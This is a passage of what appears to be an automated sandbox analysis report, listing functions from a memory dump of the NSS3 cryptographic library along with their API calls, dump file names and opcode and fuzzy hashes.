Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD081B
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD0825

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Error$HashLookupTableUtil$Alloc_ConstFind
String ID:
API String ID: 99596740-0
Opcode ID: 572f65908ea1ffc768664bd3d3f96cd887aaedc5763b82bdcb372f1553996ea1
Instruction ID: ac0b1e631949e30ff84ec6b3d58e6ee37ff76b847e199239055a7287f775107b
Opcode Fuzzy Hash: 572f65908ea1ffc768664bd3d3f96cd887aaedc5763b82bdcb372f1553996ea1
Instruction Fuzzy Hash: C4312635A0351497E71446199880B6972B5EB4932CF2C0A36DF95C7FF1EB21ECC4A2C2

Function 6CB8A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6CB8A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6CB8A662), ref: 6CB8A69E
Part of subcall function 6CB8A690: PR_NewCondVar.NSS3(?), ref: 6CB8A6B4

PR_IntervalNow.NSS3 ref: 6CB8A8C6
EnterCriticalSection.KERNEL32(?), ref: 6CB8A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6CB8A944
PR_SetPollableEvent.NSS3(?), ref: 6CB8A94F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: c15a66d82de470d6cc86e49fba8da6926dd7ace38a0bc2413262a8b8f79baf77
Instruction ID: 7bd501bec870b553750a0c3eab58d9689115125553d33991230d27cd7dc9fa64
Opcode Fuzzy Hash: c15a66d82de470d6cc86e49fba8da6926dd7ace38a0bc2413262a8b8f79baf77
Instruction Fuzzy Hash: 484144B4A06A12CFC704CF29C58095AFBF5FF48318724852AE859CBB91E731E850CF91

Function 6CB47DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB47E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB47EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB47EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CB47ED8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 7e3072c3c0c394ba4ecc5fae52deed0fd015313f503f6dbfacb7ae9fa74fda95
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: 3F31B5B1A411518FDB04CF08C8909DEBBE6FF8831871B8669C8586BB15EB71EC45CBD1

Function 6CAE2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6CAE1289,?), ref: 6CAE2D72

Part of subcall function 6CAE3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6CAE2CA7,E80C76FF,?,6CAE1289,?), ref: 6CAE33E9
Part of subcall function 6CAE3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6CAE342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAE1289,?), ref: 6CAE2D61

Part of subcall function 6CAE0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAE0B21
Part of subcall function 6CAE0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAE0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6CAE1289,?), ref: 6CAE2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6CAE1289,?), ref: 6CAE2DAF

Part of subcall function 6CA9B8F0: PR_CallOnceWithArg.NSS3(6CBD2178,6CA9BCF0,?), ref: 6CA9B915
Part of subcall function 6CA9B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6CA9B933
Part of subcall function 6CA9B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6CA9B9C8
Part of subcall function 6CA9B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CA9B9E1

Part of subcall function 6CAE0A50: SECOID_GetAlgorithmTag_Util.NSS3(6CAE2A90,E8571076,?,6CAE2A7C,6CAE21F1,?,?,?,00000000,00000000,?,?,6CAE21DD,00000000), ref: 6CAE0A66

Part of subcall function 6CAE3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6CAE2D1E,?,?,?,?,00000000,?,?,?,?,?,6CAE1289), ref: 6CAE3348

Part of subcall function 6CAE06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6CAE2E70,00000000), ref: 6CAE0701

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: 71c1177290eae8c70b2de19c20bea2722d5f09108f27c454de34e7cb7cbbe400
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: 3631DDB59002066BDB005E64DD44F9A3765AF4931DF180230ED155BB91F731E99CD7E2

Function 6CA76C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA76C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA76CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA76CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CB98FE0), ref: 6CA76CFE

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 237a3796686225cda55dca6e1b80e750888a1cdd673520ee547fa9d0b8680d35
Instruction ID: 107e041ee81521705cce51c75d513fccceccfe2e0a61144a0716db35049af26d
Opcode Fuzzy Hash: 237a3796686225cda55dca6e1b80e750888a1cdd673520ee547fa9d0b8680d35
Instruction Fuzzy Hash: 1C31C0B5A002069FDB18CF65C881ABFBBF9FF45248B14442DD905D7701EB319845CBA0

Function 6CB84F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6CB84F5D
free.MOZGLUE(?), ref: 6CB84F74
free.MOZGLUE(?), ref: 6CB84F82
GetLastError.KERNEL32 ref: 6CB84F90

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 1155375bf1417211110585d4a705ac4bacedc7ee10cb2161ca66569114227f33
Instruction ID: 69b79bcba4085e02aad6e28c2c08401ea99a605cde1196df36aa8f71d4a2eb43
Opcode Fuzzy Hash: 1155375bf1417211110585d4a705ac4bacedc7ee10cb2161ca66569114227f33
Instruction Fuzzy Hash: A3314B75A012594BDF01CB69DC51BDF73BCFF45348F050229EC19A7780D734D9058A91

Function 6CAE6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CAE6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAE6E57

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CAE6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CAE6EAA

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: a758f2d1a7a2dcc85644dd758bcb20c3d912c57a1b003838e772411cffe0fd76
Instruction ID: 27e7f2d2cbf7beacaa5e93b00182fe3ccd4382bce8fb6e28d171066a7ccc2563
Opcode Fuzzy Hash: a758f2d1a7a2dcc85644dd758bcb20c3d912c57a1b003838e772411cffe0fd76
Instruction Fuzzy Hash: 3D31B17161065AEADB141E34D8043AAB7B5AB0931AF140A3CD699D6BC1EB30B4D8DBC1

Function 6CACDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CACDDB1,?,00000000), ref: 6CACDDF4

Part of subcall function 6CAD14C0: TlsGetValue.KERNEL32 ref: 6CAD14E0
Part of subcall function 6CAD14C0: EnterCriticalSection.KERNEL32 ref: 6CAD14F5
Part of subcall function 6CAD14C0: PR_Unlock.NSS3 ref: 6CAD150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CACDDB1,?,00000000), ref: 6CACDE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CACDDB1,?,00000000), ref: 6CACDE17

Part of subcall function 6CAD0BE0: malloc.MOZGLUE(6CAC8D2D,?,00000000,?), ref: 6CAD0BF8
Part of subcall function 6CAD0BE0: TlsGetValue.KERNEL32(6CAC8D2D,?,00000000,?), ref: 6CAD0C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CACDE80

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 3cfeac9121ef8687b8c8267051581fe81477302d5d878c58b969eeebf328e1d8
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 6931A4B1E417429BE700CF56D880666B7F4BFA5318B24822ED91D87B01E770F5E4CB92

Function 6CABFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CA95ADC,?,00000000,00000001,?,?,00000000,?,6CA8BA55,?,?), ref: 6CABFE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CABFE5F
PR_Unlock.NSS3(78831D74), ref: 6CABFEC2
PR_SetError.NSS3(00000000,00000000), ref: 6CABFED6

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: b4e4b4f17800741175edf77650e040070afff3579f0fa1334764591cea16be2c
Instruction ID: 17e7d97e2398757ad3bca25966bf608853a642fd86620371885937255f71fcfe
Opcode Fuzzy Hash: b4e4b4f17800741175edf77650e040070afff3579f0fa1334764591cea16be2c
Instruction Fuzzy Hash: 3621D039A00625ABD711AF69DC447AAB3B8FF05358F4C0128FD0567E42E731E9A8CBD1

Function 6CAE2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6CAE2896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6CAE2932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAE294C
free.MOZGLUE(?), ref: 6CAE2955

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: 3ba3548bee17f2588895ca70f3b4c33e99ddc1b410bee4f661f7357511da13fe
Instruction ID: fb1e5a76c04cef304151c29b7dac1f8fe0f8abfe8d7cdb6436dc0da580071172
Opcode Fuzzy Hash: 3ba3548bee17f2588895ca70f3b4c33e99ddc1b410bee4f661f7357511da13fe
Instruction Fuzzy Hash: EC21F7B66006019BE7208F26DD4DF4377E5AF88358F080638E44A87B60FB71E4889791

Function 6CB1A8F0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6CB02AE9,00000000,0000065C), ref: 6CB1A91D

Part of subcall function 6CABADC0: TlsGetValue.KERNEL32(?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE10
Part of subcall function 6CABADC0: EnterCriticalSection.KERNEL32(?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE24
Part of subcall function 6CABADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CA9D079,00000000,00000001), ref: 6CABAE5A
Part of subcall function 6CABADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE6F
Part of subcall function 6CABADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAE7F
Part of subcall function 6CABADC0: TlsGetValue.KERNEL32(?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEB1
Part of subcall function 6CABADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA9CDBB,?,6CA9D079,00000000,00000001), ref: 6CABAEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6CB02AE9,00000000,0000065C), ref: 6CB1A934
SECITEM_ZfreeItem_Util.NSS3(00068C9A,00000000,00000000,00000000,?,?,6CB02AE9,00000000,0000065C), ref: 6CB1A949
free.MOZGLUE(00068C86,00000000,0000065C), ref: 6CB1A952

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 9e97d5baaebcbfb26e1820b232a3feadc2722ddc01bced974c7d474d2ff3d7d1
Instruction ID: d7e685065480d5dbf5f97f4bd061d04c8e26cae6a7806c916d1cee60704c688d
Opcode Fuzzy Hash: 9e97d5baaebcbfb26e1820b232a3feadc2722ddc01bced974c7d474d2ff3d7d1
Instruction Fuzzy Hash: 71314BB46052019FD704CF19D980E62B7E8FF48358B1581A9E8098FB56E730FD49CFA2

Function 6CAB4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6CABB60F,00000000), ref: 6CAB5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6CABB60F,00000000), ref: 6CAB501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6CABB60F,00000000), ref: 6CAB504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6CABB60F,00000000), ref: 6CAB5064

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 6d365a72b1be21d19d0571eb273e6596d719e4b18cdb158c8fe9ee6d88877df3
Instruction ID: e95f4c9ddedfa2c447e37a5a742ea396908b1d75956a5d9f8cfb6307c5e3e094
Opcode Fuzzy Hash: 6d365a72b1be21d19d0571eb273e6596d719e4b18cdb158c8fe9ee6d88877df3
Instruction Fuzzy Hash: B63117B4A05A06CFDB00EF68D48466ABBF8FF09304F158569E859E7701E730E994CBD1

Function 6CA71EC0 Relevance: 6.1, APIs: 4, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6CA74C64,?,-00000004), ref: 6CA71EE2

Part of subcall function 6CAD1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CA71D97,?,?), ref: 6CAD1836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CA74C64,?,-00000004), ref: 6CA71F13
DER_DecodeTimeChoice_Util.NSS3(?,6CA74CA0,?,?,?,?,?,?,00000000,00000000,?,6CA74C64,?,-00000004), ref: 6CA71F37
DER_DecodeTimeChoice_Util.NSS3(?,6CA74C1C,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA74C64,?,-00000004), ref: 6CA71F53

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID:
API String ID: 3216063065-0
Opcode ID: d5eaddc673d98e2b86c36fc70c0b44307c9868ab42d049c7a8b37a1bbe5c0916
Instruction ID: 460414e336a8c7422127c2e7b06023e7d4c19f4937d853d9e98b63b7ed2a95e2
Opcode Fuzzy Hash: d5eaddc673d98e2b86c36fc70c0b44307c9868ab42d049c7a8b37a1bbe5c0916
Instruction Fuzzy Hash: AE21C575504345AFC750CF65CD10AAB77E9BB94658F040929EA48C3A00F330E688C7E2

Function 6CAE2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CAE2E08

Part of subcall function 6CAD14C0: TlsGetValue.KERNEL32 ref: 6CAD14E0
Part of subcall function 6CAD14C0: EnterCriticalSection.KERNEL32 ref: 6CAD14F5
Part of subcall function 6CAD14C0: PR_Unlock.NSS3 ref: 6CAD150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CAE2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CAE2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAE2E95

Part of subcall function 6CAD1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA788A4,00000000,00000000), ref: 6CAD1228
Part of subcall function 6CAD1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CAD1238
Part of subcall function 6CAD1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CA788A4,00000000,00000000), ref: 6CAD124B
Part of subcall function 6CAD1200: PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0,00000000,00000000,00000000,?,6CA788A4,00000000,00000000), ref: 6CAD125D
Part of subcall function 6CAD1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CAD126F
Part of subcall function 6CAD1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CAD1280
Part of subcall function 6CAD1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CAD128E
Part of subcall function 6CAD1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CAD129A
Part of subcall function 6CAD1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CAD12A1

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true
